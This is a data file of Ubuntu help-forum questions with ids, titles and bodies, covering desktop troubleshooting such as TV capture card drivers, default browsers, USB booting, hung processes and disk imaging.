19846	adding icon to the system tray ( notification area )	hello , i have a small audio recording application programmed with gtk/gdk . ( see picture ) . and i would like to add a tray-icon for it so users can control the application window and recording from it . adding a tray icon : i have planned to use the gtkstatusicon class for this task . ref : http : //library.gnome.org/devel/gtk/2.11/gtkstatusicon.html is gtkstatusicon the recommended solution that also works in ubuntu 's unity and in the gnome 3.0 desktop ? i already googled a bit and found a good example on gtkstatusicon . could i also use libindicator for this task ? ref : https : //launchpad.net/libindicator
19848	is there a way to enable the media keys when the screen is locked ?	i own a dell studio xps 16 . the media keys work fine when logged in , but stop working after the screen is locked . although i can imagine this being classified under the 'feature , not a bug ' class , in some cases it could still be a very handy option to be able to to mute the sound when the screen is locked , for example . is there a way to use the media keys , even when the screen is locked ?
19849	how do you setup the driver for a philips based tv capture card ?	i have a tv card that i have not managed to install with ubuntu 10.10 i386 . i have tried various topics in various forums and i could not install it . i hope you can help me to install it thank you . lspci 01:07.0 multimedia controller : philips semiconductors saa7130 video broadcast decoder ( rev 01 ) dmesg [ 10299.516344 ] saa7134 alsa driver for dma sound unloaded [ 11385.340661 ] linux video capture interface : v2.00 [ 11385.384278 ] saa7130/34 : v4l2 driver version 0.2.16 loaded [ 11385.384390 ] saa7130 [ 0 ] : found at 0000:01:07.0 , rev : 1 , irq : 17 , latency : 32 , mmio : 0x0 [ 11385.384403 ] saa7130 [ 0 ] : subsystem : 1131:0000 , board : lifeview/typhoon flyvideo2000 [ card=3 , insmod option ] [ 11385.384412 ] saa7130 [ 0 ] : ca n't get mmio memory @ 0x0 [ 11385.384431 ] saa7134 : probe of 0000:01:07.0 failed with error -16 [ 11385.401174 ] saa7134 alsa driver for dma sound loaded [ 11385.401182 ] saa7134 alsa : no saa7134 cards found [ 11477.797019 ] tvtime [ 12534 ] : segfault at 6b0 ip 0804cf64 sp bf928a4c error 4 in tvtime [ 8048000+76000 ] [ 11626.141821 ] tvtime [ 12549 ] : segfault at 6b0 ip 0804cf64 sp bfec357c error 4 in tvtime [ 8048000+76000 ] [ 12218.120632 ] saa7134 alsa driver for dma sound unloaded [ 12464.993061 ] linux video capture interface : v2.00 [ 12465.028285 ] saa7130/34 : v4l2 driver version 0.2.16 loaded [ 12465.028392 ] saa7130 [ 0 ] : found at 0000:01:07.0 , rev : 1 , irq : 17 , latency : 32 , mmio : 0x0 [ 12465.028404 ] saa7134 : < rant > [ 12465.028406 ] saa7134 : congratulations ! your tv card vendor saved a few [ 12465.028408 ] saa7134 : cents for a eeprom , thus your pci board has no [ 12465.028411 ] saa7134 : subsystem id and i ca n't identify it automatically [ 12465.028414 ] saa7134 : < /rant > [ 12465.028416 ] saa7134 : i feel better now . ok , here are the good news : [ 12465.028418 ] saa7134 : you can use the card= < nr > insmod option to specify [ 12465.028421 ] saa7134 : which board do you have . the list : [ 12465.028428 ] saa7134 : card=0 - > unknown/generic [ 12465.028435 ] saa7134 : card=1 - > proteus pro [ philips reference design ] 1131:2001 1131:2001 [ 12465.028447 ] saa7134 : card=2 - > lifeview flyvideo3000 5168:0138 4e42:0138 [ 12465.028457 ] saa7134 : card=3 - > lifeview/typhoon flyvideo2000 5168:0138 4e42:0138 [ 12465.028467 ] saa7134 : card=4 - > empress 1131:6752 [ 12465.028475 ] saa7134 : card=5 - > sknet monster tv 1131:4e85 [ 12465.028484 ] saa7134 : card=6 - > tevion md 9717 [ 12465.028491 ] saa7134 : card=7 - > knc one tv-station rds / typhoon tv tune 1131 : fe01 1894 : fe01 [ 12465.028501 ] saa7134 : card=8 - > terratec cinergy 400 tv 153b:1142 [ 12465.028510 ] saa7134 : card=9 - > medion 5044 [ 12465.028517 ] saa7134 : card=10 - > kworld/kuroutoshikou saa7130-tvpci [ 12465.028523 ] saa7134 : card=11 - > terratec cinergy 600 tv 153b:1143 [ 12465.028532 ] saa7134 : card=12 - > medion 7134 16be:0003 16be:5000 [ 12465.028542 ] saa7134 : card=13 - > typhoon tv+radio 90031 [ 12465.028548 ] saa7134 : card=14 - > elsa ex-vision 300tv 1048:226b [ 12465.028557 ] saa7134 : card=15 - > elsa ex-vision 500tv 1048:226a [ 12465.028565 ] saa7134 : card=16 - > asus tv-fm 7134 1043:4842 1043:4830 1043:4840 [ 12465.028576 ] saa7134 : card=17 - > aopen va1000 power 1131:7133 [ 12465.028585 ] saa7134 : card=18 - > bmk mpex no tuner [ 12465.028592 ] saa7134 : card=19 - > compro videomate tv 185b : c100 [ 12465.028600 ] saa7134 : card=20 - > matrox cronosplus 102b:48d0 [ 12465.028608 ] saa7134 : card=21 - > 10moons pci tv capture card 1131:2001 [ 12465.028617 ] saa7134 : card=22 - > avermedia m156 / medion 2819 1461 : a70b [ 12465.028625 ] saa7134 : card=23 - > bmk mpex tuner [ 12465.028632 ] saa7134 : card=24 - > knc one tv-station dvr 1894 : a006 [ 12465.028640 ] saa7134 : card=25 - > asus tv-fm 7133 1043:4843 [ 12465.028648 ] saa7134 : card=26 - > pinnacle pctv stereo ( saa7134 ) 11bd:002b [ 12465.028657 ] saa7134 : card=27 - > manli muchtv m-tv002 [ 12465.028663 ] saa7134 : card=28 - > manli muchtv m-tv001 [ 12465.028670 ] saa7134 : card=29 - > nagase sangyo transgear 3000tv 1461:050c [ 12465.028679 ] saa7134 : card=30 - > elitegroup ecs tvp3xp fm1216 tuner card ( 1019:4cb4 [ 12465.028687 ] saa7134 : card=31 - > elitegroup ecs tvp3xp fm1236 tuner card 1019:4cb5 [ 12465.028695 ] saa7134 : card=32 - > avacs smarttv [ 12465.028702 ] saa7134 : card=33 - > avermedia dvd ezmaker 1461:10ff [ 12465.028710 ] saa7134 : card=34 - > noval prime tv 7133 [ 12465.028717 ] saa7134 : card=35 - > avermedia avertv studio 305 1461:2115 [ 12465.028725 ] saa7134 : card=36 - > upmost purple tv 12ab:0800 [ 12465.028734 ] saa7134 : card=37 - > items muchtv plus / it-005 [ 12465.028740 ] saa7134 : card=38 - > terratec cinergy 200 tv 153b:1152 [ 12465.028749 ] saa7134 : card=39 - > lifeview flytv platinum mini 5168:0212 4e42:0212 5169:1502 [ 12465.028760 ] saa7134 : card=40 - > compro videomate tv pvr/fm 185b : c100 [ 12465.028768 ] saa7134 : card=41 - > compro videomate tv gold+ 185b : c100 [ 12465.028776 ] saa7134 : card=42 - > sabrent sbt-tvfm ( saa7130 ) [ 12465.028783 ] saa7134 : card=43 - > : zolid xpert tv7134 [ 12465.028790 ] saa7134 : card=44 - > empire pci tv-radio le [ 12465.028796 ] saa7134 : card=45 - > avermedia avertv studio 307 1461:9715 [ 12465.028805 ] saa7134 : card=46 - > avermedia cardbus tv/radio ( e500 ) 1461 : d6ee [ 12465.028813 ] saa7134 : card=47 - > terratec cinergy 400 mobile 153b:1162 [ 12465.028821 ] saa7134 : card=48 - > terratec cinergy 600 tv mk3 153b:1158 [ 12465.028830 ] saa7134 : card=49 - > compro videomate gold+ pal 185b : c200 [ 12465.028838 ] saa7134 : card=50 - > pinnacle pctv 300i dvb-t + pal 11bd:002d [ 12465.028847 ] saa7134 : card=51 - > provideo pv952 1540:9524 [ 12465.028855 ] saa7134 : card=52 - > avermedia avertv/305 1461:2108 [ 12465.028863 ] saa7134 : card=53 - > asus tv-fm 7135 1043:4845 [ 12465.028871 ] saa7134 : card=54 - > lifeview flytv platinum fm / gold 5168:0214 5168:5214 1489:0214 5168:0304 [ 12465.028884 ] saa7134 : card=55 - > lifeview flydvb-t duo / msi tv @ nywhere d 5168:0306 4e42:0306 [ 12465.028894 ] saa7134 : card=56 - > avermedia avertv 307 1461 : a70a [ 12465.028903 ] saa7134 : card=57 - > avermedia avertv go 007 fm 1461 : f31f [ 12465.028911 ] saa7134 : card=58 - > ads tech instant tv ( saa7135 ) 1421:0350 1421:0351 1421:0370 1421:1370 [ 12465.028924 ] saa7134 : card=59 - > kworld/tevion v-stream xpert tv pvr7134 [ 12465.028931 ] saa7134 : card=60 - > lifeview/typhoon/genius flydvb-t duo car 5168:0502 4e42:0502 1489:0502 [ 12465.028942 ] saa7134 : card=61 - > philips tough dvb-t reference design 1131:2004 [ 12465.028951 ] saa7134 : card=62 - > compro videomate tv gold+ii [ 12465.028958 ] saa7134 : card=63 - > kworld xpert tv pvr7134 [ 12465.028964 ] saa7134 : card=64 - > flytv mini asus digimatrix 1043:0210 [ 12465.028973 ] saa7134 : card=65 - > v-stream studio tv terminator [ 12465.028980 ] saa7134 : card=66 - > yuan tun-900 ( saa7135 ) [ 12465.028986 ] saa7134 : card=67 - > beholder beholdtv 409 fm 0000:4091 [ 12465.028995 ] saa7134 : card=68 - > gotview 7135 pci 5456:7135 [ 12465.029003 ] saa7134 : card=69 - > philips europa v3 reference design 1131:2004 [ 12465.029011 ] saa7134 : card=70 - > compro videomate dvb-t300 185b : c900 [ 12465.029020 ] saa7134 : card=71 - > compro videomate dvb-t200 185b : c901 [ 12465.029028 ] saa7134 : card=72 - > rtd embedded technologies vfg7350 1435:7350 [ 12465.029036 ] saa7134 : card=73 - > rtd embedded technologies vfg7330 1435:7330 [ 12465.029045 ] saa7134 : card=74 - > lifeview flytv platinum mini2 14c0:1212 [ 12465.029053 ] saa7134 : card=75 - > avermedia avertvhd mce a180 1461:1044 [ 12465.029062 ] saa7134 : card=76 - > sknet monstertv mobile 1131:4ee9 [ 12465.029070 ] saa7134 : card=77 - > pinnacle pctv 40i/50i/110i ( saa7133 ) 11bd:002e [ 12465.029078 ] saa7134 : card=78 - > asustek p7131 dual 1043:4862 [ 12465.029087 ] saa7134 : card=79 - > sedna/muchtv pc tv cardbus tv/radio ( ito [ 12465.029094 ] saa7134 : card=80 - > asus digimatrix tv 1043:0210 [ 12465.029102 ] saa7134 : card=81 - > philips tiger reference design 1131:2018 [ 12465.029110 ] saa7134 : card=82 - > msi tv @ anywhere plus 1462:6231 1462:8624 [ 12465.029120 ] saa7134 : card=83 - > terratec cinergy 250 pci tv 153b:1160 [ 12465.029128 ] saa7134 : card=84 - > lifeview flydvb trio 5168:0319 [ 12465.029137 ] saa7134 : card=85 - > avertv dvb-t 777 1461:2c05 1461:2c05 [ 12465.029147 ] saa7134 : card=86 - > lifeview flydvb-t / genius videowonder d 5168:0301 1489:0301 [ 12465.029156 ] saa7134 : card=87 - > ads instant tv duo cardbus ptv331 0331:1421 [ 12465.029165 ] saa7134 : card=88 - > tevion/kworld dvb-t 220rf 17de:7201 [ 12465.029173 ] saa7134 : card=89 - > elsa ex-vision 700tv 1048:226c [ 12465.029182 ] saa7134 : card=90 - > kworld atsc110/115 17de:7350 17de:7352 [ 12465.029191 ] saa7134 : card=91 - > avermedia a169 b 1461:7360 [ 12465.029200 ] saa7134 : card=92 - > avermedia a169 b1 1461:6360 [ 12465.029208 ] saa7134 : card=93 - > medion 7134 bridge # 2 16be:0005 [ 12465.029216 ] saa7134 : card=94 - > lifeview flydvb-t hybrid cardbus/msi tv 5168:3306 5168:3502 5168:3307 4e42:3502 [ 12465.029229 ] saa7134 : card=95 - > lifeview flyvideo3000 ( ntsc ) 5169:0138 [ 12465.029238 ] saa7134 : card=96 - > medion md8800 quadro 16be:0007 16be:0008 16be:000d [ 12465.029249 ] saa7134 : card=97 - > lifeview flydvb-s /acorp tv134ds 5168:0300 4e42:0300 [ 12465.029259 ] saa7134 : card=98 - > proteus pro 2309 0919:2003 [ 12465.029267 ] saa7134 : card=99 - > avermedia tv hybrid a16ar 1461:2c00 [ 12465.029276 ] saa7134 : card=100 - > asus europa2 oem 1043:4860 [ 12465.029284 ] saa7134 : card=101 - > pinnacle pctv 310i 11bd:002f [ 12465.029293 ] saa7134 : card=102 - > avermedia avertv studio 507 1461:9715 [ 12465.029301 ] saa7134 : card=103 - > compro videomate dvb-t200a [ 12465.029308 ] saa7134 : card=104 - > hauppauge wintv-hvr1110 dvb-t/hybrid 0070:6700 0070:6701 0070:6702 0070:6703 0070:6704 0070:6705 [ 12465.029324 ] saa7134 : card=105 - > terratec cinergy ht pcmcia 153b:1172 [ 12465.029332 ] saa7134 : card=106 - > encore enltv 1131:2342 1131:2341 3016:2344 [ 12465.029344 ] saa7134 : card=107 - > encore enltv-fm 1131:230f [ 12465.029352 ] saa7134 : card=108 - > terratec cinergy ht pci 153b:1175 [ 12465.029360 ] saa7134 : card=109 - > philips tiger - s reference design [ 12465.029367 ] saa7134 : card=110 - > avermedia m102 1461 : f31e [ 12465.029375 ] saa7134 : card=111 - > asus p7131 4871 1043:4871 [ 12465.029384 ] saa7134 : card=112 - > asustek p7131 hybrid 1043:4876 [ 12465.029392 ] saa7134 : card=113 - > elitegroup ecs tvp3xp fm1246 tuner card 1019:4cb6 [ 12465.029401 ] saa7134 : card=114 - > kworld dvb-t 210 17de:7250 [ 12465.029409 ] saa7134 : card=115 - > sabrent pcmcia tv-pcb05 0919:2003 [ 12465.029418 ] saa7134 : card=116 - > 10moons tm300 tv card 1131:2304 [ 12465.029426 ] saa7134 : card=117 - > avermedia super 007 1461 : f01d [ 12465.029435 ] saa7134 : card=118 - > beholder beholdtv 401 0000:4016 [ 12465.029443 ] saa7134 : card=119 - > beholder beholdtv 403 0000:4036 [ 12465.029451 ] saa7134 : card=120 - > beholder beholdtv 403 fm 0000:4037 [ 12465.029459 ] saa7134 : card=121 - > beholder beholdtv 405 0000:4050 [ 12465.029468 ] saa7134 : card=122 - > beholder beholdtv 405 fm 0000:4051 [ 12465.029476 ] saa7134 : card=123 - > beholder beholdtv 407 0000:4070 [ 12465.029484 ] saa7134 : card=124 - > beholder beholdtv 407 fm 0000:4071 [ 12465.029493 ] saa7134 : card=125 - > beholder beholdtv 409 0000:4090 [ 12465.029501 ] saa7134 : card=126 - > beholder beholdtv 505 fm 5ace:5050 [ 12465.029510 ] saa7134 : card=127 - > beholder beholdtv 507 fm / beholdtv 509 5ace:5070 5ace:5090 [ 12465.029520 ] saa7134 : card=128 - > beholder beholdtv columbus tvfm 0000:5201 [ 12465.029528 ] saa7134 : card=129 - > beholder beholdtv 607 fm 5ace:6070 [ 12465.029537 ] saa7134 : card=130 - > beholder beholdtv m6 5ace:6190 [ 12465.029545 ] saa7134 : card=131 - > twinhan hybrid dtv-dvb 3056 pci 1822:0022 [ 12465.029554 ] saa7134 : card=132 - > genius tvgo am11mce [ 12465.029560 ] saa7134 : card=133 - > nxp snake dvb-s reference design [ 12465.029567 ] saa7134 : card=134 - > medion/creatix ctx953 hybrid 16be:0010 [ 12465.029576 ] saa7134 : card=135 - > msi tv @ nywhere a/d v1.1 1462:8625 [ 12465.029584 ] saa7134 : card=136 - > avermedia cardbus tv/radio ( e506r ) 1461 : f436 [ 12465.029592 ] saa7134 : card=137 - > avermedia hybrid tv/radio ( a16d ) 1461 : f936 [ 12465.029601 ] saa7134 : card=138 - > avermedia m115 1461 : a836 [ 12465.029609 ] saa7134 : card=139 - > compro videomate t750 185b : c900 [ 12465.029617 ] saa7134 : card=140 - > avermedia dvb-s pro a700 1461 : a7a1 [ 12465.029626 ] saa7134 : card=141 - > avermedia dvb-s hybrid+fm a700 1461 : a7a2 [ 12465.029634 ] saa7134 : card=142 - > beholder beholdtv h6 5ace:6290 [ 12465.029642 ] saa7134 : card=143 - > beholder beholdtv m63 5ace:6191 [ 12465.029651 ] saa7134 : card=144 - > beholder beholdtv m6 extra 5ace:6193 [ 12465.029659 ] saa7134 : card=145 - > avermedia minipci dvb-t hybrid m103 1461 : f636 1461 : f736 [ 12465.029669 ] saa7134 : card=146 - > asustek p7131 analog [ 12465.029676 ] saa7134 : card=147 - > asus tiger 3in1 1043:4878 [ 12465.029684 ] saa7134 : card=148 - > encore enltv-fm v5.3 1a7f:2008 [ 12465.029693 ] saa7134 : card=149 - > avermedia pci pure analog ( m135a ) 1461 : f11d [ 12465.029701 ] saa7134 : card=150 - > zogis real angel 220 [ 12465.029708 ] saa7134 : card=151 - > ads tech instant hdtv 1421:0380 [ 12465.029716 ] saa7134 : card=152 - > asus tiger rev:1.00 1043:4857 [ 12465.029725 ] saa7134 : card=153 - > kworld plus tv analog lite pci 17de:7128 [ 12465.029733 ] saa7134 : card=154 - > avermedia avertv go 007 fm plus 1461 : f31d [ 12465.029742 ] saa7134 : card=155 - > hauppauge wintv-hvr1150 atsc/qam-hybrid 0070:6706 0070:6708 [ 12465.029752 ] saa7134 : card=156 - > hauppauge wintv-hvr1120 dvb-t/hybrid 0070:6707 0070:6709 0070:670a [ 12465.029763 ] saa7134 : card=157 - > avermedia avertv studio 507ua 1461 : a11b [ 12465.029772 ] saa7134 : card=158 - > avermedia cardbus tv/radio ( e501r ) 1461 : b7e9 [ 12465.029780 ] saa7134 : card=159 - > beholder beholdtv 505 rds 0000:505b [ 12465.029789 ] saa7134 : card=160 - > beholder beholdtv 507 rds 0000:5071 [ 12465.029797 ] saa7134 : card=161 - > beholder beholdtv 507 rds 0000:507b [ 12465.029806 ] saa7134 : card=162 - > beholder beholdtv 607 fm 5ace:6071 [ 12465.029815 ] saa7134 : card=163 - > beholder beholdtv 609 fm 5ace:6090 [ 12465.029823 ] saa7134 : card=164 - > beholder beholdtv 609 fm 5ace:6091 [ 12465.029832 ] saa7134 : card=165 - > beholder beholdtv 607 rds 5ace:6072 [ 12465.029840 ] saa7134 : card=166 - > beholder beholdtv 607 rds 5ace:6073 [ 12465.029849 ] saa7134 : card=167 - > beholder beholdtv 609 rds 5ace:6092 [ 12465.029857 ] saa7134 : card=168 - > beholder beholdtv 609 rds 5ace:6093 [ 12465.029866 ] saa7134 : card=169 - > compro videomate s350/s300 185b : c900 [ 12465.029874 ] saa7134 : card=170 - > avermedia avertv studio 505 1461 : a115 [ 12465.029883 ] saa7134 : card=171 - > beholder beholdtv x7 5ace:7595 [ 12465.029892 ] saa7134 : card=172 - > rovermedia tv link pro fm 19d1:0138 [ 12465.029900 ] saa7134 : card=173 - > zolid hybrid tv tuner pci 1131:2004 [ 12465.029909 ] saa7134 : card=174 - > asus europa hybrid oem 1043:4847 [ 12465.029917 ] saa7134 : card=175 - > leadtek winfast dtv1000s 107d:6655 [ 12465.029926 ] saa7134 : card=176 - > beholder beholdtv 505 rds 0000:5051 [ 12465.029934 ] saa7134 : card=177 - > hawell hw-404m7 [ 12465.029941 ] saa7134 : card=178 - > beholder beholdtv h7 [ 12465.029948 ] saa7134 : card=179 - > beholder beholdtv a7 [ 12465.029955 ] saa7134 : card=180 - > avermedia pci m733a 1461:4155 1461:4255 [ 12465.029967 ] saa7130 [ 0 ] : subsystem : 1131:0000 , board : unknown/generic [ card=0 , autodetected ] [ 12465.030033 ] saa7130 [ 0 ] : ca n't get mmio memory @ 0x0 [ 12465.030051 ] saa7134 : probe of 0000:01:07.0 failed with error -16 [ 12465.053892 ] saa7134 alsa driver for dma sound loaded [ 12465.053900 ] saa7134 alsa : no saa7134 cards found tvtime-scanner leyendo la configuraci贸n de /etc/tvtime/tvtime.xml leyendo la configuraci贸n de /home/ricardo/.tvtime/tvtime.xml escaneando usando la norma de tv ntsc . /home/ricardo/.tvtime/stationlist.xml : no existing ntsc station list `` custom '' . videoinput : can not open capture device /dev/video0 : no existe el dispositivo o la direcci贸n ls /dev/ autofs disk fd0u1743 hpet lp0 pktcdvd ram14 root sg2 tty11 tty22 tty33 tty44 tty55 tty9 vcs2 vcsa6 block dvd fd0u1760 input mapper port ram15 rtc shm tty12 tty23 tty34 tty45 tty56 ttys0 vcs3 vcsa7 bsg dvdrw fd0u1840 kmsg mcelog ppp ram2 rtc0 snapshot tty13 tty24 tty35 tty46 tty57 ttys1 vcs4 vga_arbiter btrfs-control ecryptfs fd0u1920 log mem psaux ram3 scd0 snd tty14 tty25 tty36 tty47 tty58 ttys2 vcs5 zero bus fd fd0u360 loop0 net ptmx ram4 sda sr0 tty15 tty26 tty37 tty48 tty59 ttys3 vcs6 c drom fd0 fd0u720 loop1 network_latency pts ram5 sda1 stderr tty16 tty27 tty38 tty49 tty6 uinput vcs7 cdrw fd0u1040 fd0u800 loop2 network_throughput ram0 ram6 sdb stdin tty17 tty28 tty39 tty5 tty60 urandom vcsa char fd0u1120 fd0u820 loop3 null ram1 ram7 sdb1 stdout tty18 tty29 tty4 tty50 tty61 usbmon0 vcsa1 console fd0u1440 fd0u830 loop4 nvidia0 ram10 ram8 sdb2 tty tty19 tty3 tty40 tty51 tty62 usbmon1 vcsa2 core fd0u1600 full loop5 nvidiactl ram11 ram9 sdb5 tty0 tty2 tty30 tty41 tty52 tty63 usbmon2 vcsa3 cpu fd0u1680 fuse loop6 oldmem ram12 random sg0 tty1 tty20 tty31 tty42 tty53 tty7 vcs vcsa4 cpu_dma_latency fd0u1722 hidraw0 loop7 parport0 ram13 rfkill sg1 tty10 tty21 tty32 tty43 tty54 tty8 vcs1 vcsa5 i followed the steps down here and still nothing i think is 42 my video card is this : http : //www.geeks.com/details.asp ? invtid=tv-pcirc & cat=vid and when i start tvtime it closes automatically .
19855	how do you globally set the default browser using kde4 ?	i 'm using awesome-wm on kubuntu 10.10 . i like some of the kde tools ... like choqok . thing is , that within awesome wm it seems to be impossible to set a default browser , because kde4 settings overwrite the generally desired settings : to illustrate the problem : % xdg-mime query default text/html chromium-browser.desktop and from ~/.kde/share/config/kdeglobals [ general ] browserapplication=firefox.desktop which does in no way make sense to me . if i set firefox as default xdg-mime should not have chrome . in fact i want firefox . so how do i globally once and for all , across all frameworks , define firefox as default ? best , marius p.s . : i should probably mention , that clicking in choqok starts konqueror ...
19858	booting but not rebooting from external usb hard drive , what could be the problem ?	i have a dell inspiron 6400 laptop with a dead internal hard drive controller . it boots perfectly from cd or usb . i therefore removed the internal hard drive and installed ubuntu 10.10 maverick onto an external usb hard drive . it boots and runs perfectly when doing a `` cold start '' of the pc . however , when i choose restart/reboot in the ubuntu menu ( e.g . after an update ) , i get this error message from the bios : `` no bootable devices , strike f1 to retry boot , f2 for setup utility , press f5 to run onboard diagnostics '' . i can make the system boot again by pressing f2 or f5 and exiting the utility without having done anything . or , i can simply power off the system and do a new `` cold start '' . does anyone know the likely reason for this problem and how to fix it . it is not a big issue but an annoyance that i would like to fix if possible .
19861	ubuntu one ( windows beta ) locks up - what to do ?	os : windows xp sp3 hardware : dell precision m4400 ( laptop ) cpu : core2duo t9600 mem : 4 gb installer- setup , first start and account- setup of ubuntuone windows client passed with no problems . after restart of ubuntuone , the cpu- usage shows 50 % ( 100 % core usage ) . exit- command ( from context-menu ) hides the trayicon , but the program is still working excessive in background ( 50 % cpu- / 50 mb memory- usage ) , until ubuntuoneclient.exe is killed by the taskmanager . what 's going on ?
19866	is there an official ubuntu free technical support team ?	i have found that there is an `` ubuntu support team '' at https : //launchpad.net/~ubuntu-helpteam but i am not sure it 's official or active . please note that i am not referring to bug fixing support , i am referring to the broader os support , with people available to engage users needing support with a problem and drive it to a proper resolution . is there an official team for this purpose with a clear scope and activity plan ?
19869	how to identify and kill hanging process , when system hangs and reacts slowly on user input ?	recently when i tried to open a video with vlc , my system slowed down , the open applications webbrowser , vlc and filemanager and others did n't react any longer . the mouse just reacted still very slowly . on a windows machine i would press a keycombi ctrl-alt-del to open the taskmanager , search the process which caused the hang and kill it . since i 'm fairly new with the use of linux i have n't figured out the best practice for solve such a situation in ubuntu . which quick and effective way would you recommend to identify the hanging process and close it , when the system already reacts very slowly on user input ?
19878	my external hd is not showing up	i have an external hd that i saved all my data on from my old windows setups . i now want to access that info on my ubuntu machine and the drive is n't mounting . i 've floated around the help files and i am not finding anything that works . the drive is firewire lacie my jolicloud machine sees it no problem . ubuntu on the other hand does not .
19880	ca n't see the subtitles in totem	i have successfully managed to load subtitles in totem and it says that the subtitles are run but , the problem is that i ca n't see them . does anybody know a fix for it ?
19881	why does chrome have so many processes on my machine ?	i 've got almost 20 processes for google chrome ( whilst only having 4 tabs open , all with barebones html ) , all hogging memory and either saying futex_wait_queue_me or poll_schedule_timeout . my fan is going wild by all this and one of the processess is eating up my entire cpu , what is happening ? ( happens to chromium too )
19882	how do you connect remotely from another country ?	normally , i installed ubuntu for people with little experience with computer . these people 's tasks are simply email , office work , and some more chit chat online . if i am with them , i can troubleshoot their troubles . however , if i am abroad , this can be a little bit of trouble . is it possible to connect to a specific ubuntu machine from a computer on another country and gain root access level ?
19886	is there a sticky note application ?	on windows 7 , there is this sticky note app that will always start itself up and show itself in the same place with all the text you have written when you boot windows up . you can also have multiple instances of the sticky note . do we have an equivalent app for ubuntu ?
19887	how do you resolve the error `` e : unmet dependencies . `` ?	i did try apt-get -f install but that did n't work either . the problem appeared after installing a modified version of libapache2-mod-wsgi . i modified the package dependencies because , as you can see from the package details link , it depends on python 3 . a version of python is required but not version 3 necessarily and i did n't want to install version 3 . there 's bug # 672901 that describes the problem . so , modifying the package dependencies worked but now that i try to install another package i get the error above . how can i get rid of it ?
19894	usb audio device loopback through speakers	i have a usb turntable which when plugged in to my ubuntu 10.10 machine appears in the audio settings as an input device ( usb pnp audio device analog stereo ) like a microphone . what i 'd like to be able to do it to have the sound for that audio device played back through the audio output ( speaker or whatever ) . i 'm not too worried if there 's a slight delay between the audio coming in and it being played out through the speakers . as far as i 'm aware this is refereed to as software loopback . i can achieve exactly what i want if i open audacity , enable software loopback and press record . obvious this is n't ideal as i do n't really want it recording what i 'm playing all the time . i know this is possible because of the audacity example however i 'd like to know if there 's a way to do it without it recording . i 've search around for a while for a piece of software that does this , however i could n't get anything even close . any help would be greatly appreciated .
19897	getting vga_switcheroo with ati mobility radeon 5650 hd to work	i have a new hp dv7 laptop with ati mobility radeon hd 5650 graphics card , and also intel graphics ( switchable ) . i have done the following and want to understand what is going on with my graphics driver resized windows 7 and did fresh install of 10.10 booted into 10.10 and things seemed to be working okay enabled ati graphics , and was clearly working on the ati rather than intel gpu ( desktop cube worked ) rebooted , got an error that modprobe could not load modules.dep , and also something about i915 symbols rebooted into recovery mode , modified xorg.conf to remove the mention of fglrx rebooted , and the errors show , but then x starts but clearly in intel graphics i would ideally like to be able to switch between the ati and intel graphics , a la vga_switcheroo . my first problem seems to be that the folder /sys/kernel/debug/vgaswitcheroo does not exist , hinting at some kind of kernel issue . what can i do to get this available ? thanks !
19898	whats the simplest way to edit and add files to `` /var/www '' ?	having installed the web server is there a simple way to set a user able to use the graphic interface to copy files and directories to the local web server /var/www i gave myself administrative privileges in ubuntu but it still does n't allow copies .
19900	use two networks at the same time ?	i want to use ubuntu 10.10 server in a classroom , a computer lab whose bandwidth is provided by a local cable isp . that 's no problem , though the school network has an ip printer that i want to use . i can not reach the printer through the cable internet . but , i have two network cards . how is it possible to use both networks at once ? eth0 ( static 192.168.1.254 ) is plugged into a four-port router , 192.168.1.1 . on the public side of the four-port router is internet provided by the cable company . i also have the classroom workstations plugged into a switch . the switch is plugged into the four-port router . the whole classroom is wired into the cable internet . the other nic , eth1 , could it be plugged into an ethernet jack in the wall ? it uses the school network , and i might receive by dhcp an ip address like 10.140.10.100 , with the printer on maybe 10.120.50.10 . i was thinking about installing the printer on the server so that it could be shared with the workstations . but how does this work ? can i just plug eth1 into the school network and access both lans ? thanks for any insight . auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.254 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 auto eth1 iface eth1 inet dhcp
19901	how to make a disk image and restore from it later ?	i 'm a new linux user . i 've reinstalled my wubi from scratch at least ten times the last few weeks because while getting the system up and running ( drivers , resolution , etc . ) i 've broken something ( x , grub , unknowns ) and i ca n't get it back to work . especially for a newbie like me , it 's easier ( and much faster ) to just reinstall the whole shebang than try to troubleshoot several layers of failed `` fixing '' attempts . coming from windows , i expect that there is some `` disk image '' utility that i can run to make a snapshot of my linux install ( and of the boot partition ! ! ) before i meddle with stuff . then , after i 've foobar'ed my machine , i would somehow restore my machine back to that working snapshot . what 's the linux equivalent of windows disk imagers like acronis true image or norton ghost ? note : i found a similar question here .
19906	beep in shell script not working ?	i 'd like to use a beep sound in a shell script . unfortunately none of the methods i found via google work for me . i tried echo -e '\a' echo -ne '\007' and the command beep after i installed it via apt . what could be the reason ?
19912	is it possible to use two different shells for different terminal windows ?	is it possible to use another shell for scripts than for standard terminal use ? the problem is , i use fish as shell at the moment and i find i very convenient . but i would like to learn a bit of shell programming in ubuntu . since there are differences between those two it would be nice , to work with fish and bash at the same time , perhaps in different terminal windows ? i know i can write a shell script and have to put the interpreter in the beginning . but for testing developing at commandline i would find it useful to fast switch between shells or use two different terminal windows with different shells in one session at the same time ?
19916	how to show gnome-terminal menubar ?	i accidentally unchecked view - > show menubar which hides the menubar for gnome-terminal , and there does n't appear to be a keyboard shortcut to show the menubar again . how can i make gnome-terminal show the menubar again ?
19919	command to open a url ?	my question is pretty simple : is there a command i can use in bash that will open a specific url in the default browser ?
19922	how can i tether my android phone with pdanet to my laptop via usb ?	for my iphone i was using this with pdanet to tether via usb . now i have an android phone , also with pdanet . i 'd appreciate any help . edit my phone is a droid x. i 'm using the latest os officially available for that phone .
19923	opening docx files	i am doing some marking that requires me to open .docx file created using microsoft office 2007+ . openoffice does n't seem to be doing a good job for it , so far , hid all the images in the documents . any idea if there is a program that is guaranteed to open .docx file correctly ? please pay attention to the word `` guaranteed '' , because otherwise i might not be fair to the students .
19927	installation does n't start , kernel thread helper message and blinking keyboard leds	i finally got my old computer to boot from a cd , then it loads the cd and i ca n't get to the installation . instead a load of messages appear , like 28603967 ] kernel_thread_helper . it just stops there ... my keyboard then starts blinking as if someone is constantly pressing scroll lock and caps lock . the only thing moving on the screen is a blinking underscore ( _ ) at the bottom of it .
19929	installing on snow leopard ?	have snow leopard 10.6.5 on a working macbook pro . have cd of ubuntu 10.10 amd.dmg in the cd drive . have refit . now what ?
